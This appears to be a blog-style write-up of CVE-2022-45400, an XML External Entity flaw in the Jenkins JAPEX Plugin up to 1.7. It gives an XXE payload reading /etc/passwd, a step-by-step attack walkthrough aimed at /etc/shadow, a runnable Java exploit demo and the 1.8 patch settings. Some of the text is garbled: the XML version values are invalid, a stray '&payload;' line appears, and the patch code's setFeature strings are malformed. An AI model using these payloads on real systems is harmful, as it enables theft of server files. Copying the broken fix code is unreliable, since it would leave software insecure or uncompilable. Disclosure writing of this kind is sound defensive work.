CVE-2022-45400 - XXE Vulnerability in Jenkins JAPEX Plugin 1.7 and Earlier – Exploiting Misconfigured XML Parsers

Published: June 2024

Introduction

A critical security vulnerability, CVE-2022-45400, has been discovered in the Jenkins JAPEX Plugin version 1.7 and earlier. This issue happens because the plugin doesn’t correctly set up its XML parser, leaving it exposed to XML External Entity (XXE) attacks). Anyone using this plugin should understand how this vulnerability works, why it is dangerous, and what steps to take to stay safe.

What is Jenkins JAPEX Plugin?

Jenkins is a popular open-source automation server. The JAPEX Plugin helps users run JAPEX benchmarks inside their Jenkins jobs. It processes XML files for configuration and report generation.

What’s the Problem – CVE-2022-45400?

In versions 1.7 and earlier of the Jenkins JAPEX Plugin, the XML parsing code did *not* disable “external entity” processing. This means that when the plugin parses XML files (for reports or settings), an attacker could sneak in XML with external entity definitions. The parser would then automatically fetch data from an attacker-controlled resource, potentially leaking sensitive server files or allowing remote code execution.

Unprotected XML parsers by default will resolve entities from the XML. Consider this simple example

<?xml version="1." encoding="ISO-8859-1"?>
<!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

If the parser is not secured, it’ll replace &xxe; with the contents of /etc/passwd. The attacker only needs to submit this XML through a feature that lets users upload or process XML (like JAPEX report import).

In Jenkins JAPEX Plugin, the vulnerable code might look like this

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(xmlInput); // xmlInput is user-supplied

What’s missing? Proper configuration to prevent XXE processing.

Let’s see how an attacker could exploit this

1. Upload Malicious XML: An attacker crafts a JAPEX report XML as above, pointing xxe to a sensitive file (say, /etc/shadow).

2. Trigger Parsing: The attacker uploads this file (maybe as a report or config file) to Jenkins JAPEX Plugin via its job interface.

3. Get Data Back: If the plugin processes the XML and then displays or logs the content of the file (via errors or output), the attacker retrieves the data.

&payload;

Here’s how to simulate the vulnerable code and exploit with Java

import javax.xml.parsers.*;
import org.w3c.dom.*;
import java.io.*;

public class XXEVulnDemo {
    public static void main(String[] args) throws Exception {
        String evilXML = "<?xml version=\"1.\"?>" +
                "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>" +
                "<foo>&xxe;</foo>";

        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // NO security features enabled!
        DocumentBuilder db = dbf.newDocumentBuilder();
        InputStream xmlInput = new ByteArrayInputStream(evilXML.getBytes());
        Document doc = db.parse(xmlInput);

        System.out.println(doc.getDocumentElement().getTextContent());
    }
}

Run this and you’ll see your /etc/passwd file printed (if on Linux)! JAPEX Plugin made the same mistake.

Patches & Fixes

As of version 1.8 (see Jenkins Security Advisory 2022-11-15), the JAPEX Plugin disables external entity parsing like this:

dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl";, true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities";, false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities";, false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

Always update to at least version 1.8 to avoid XXE!

References

- Jenkins Security Advisory: CVE-2022-45400
- OWASP: XML External Entity (XXE) Prevention Cheat Sheet
- NIST NVD: CVE-2022-45400

Conclusion

CVE-2022-45400 is a simple but high-impact bug caused by unsafe XML parsing in Jenkins JAPEX Plugin up to 1.7. If you’re running a Jenkins server with this plugin, upgrade *now* and review your XML-handling code to avoid future XXE attacks. Stay secure!

*Feel free to reach out with any questions or share your experience patching this issue!*

Timeline

Published on: 11/15/2022 20:15:00 UTC
Last modified on: 11/20/2022 03:07:00 UTC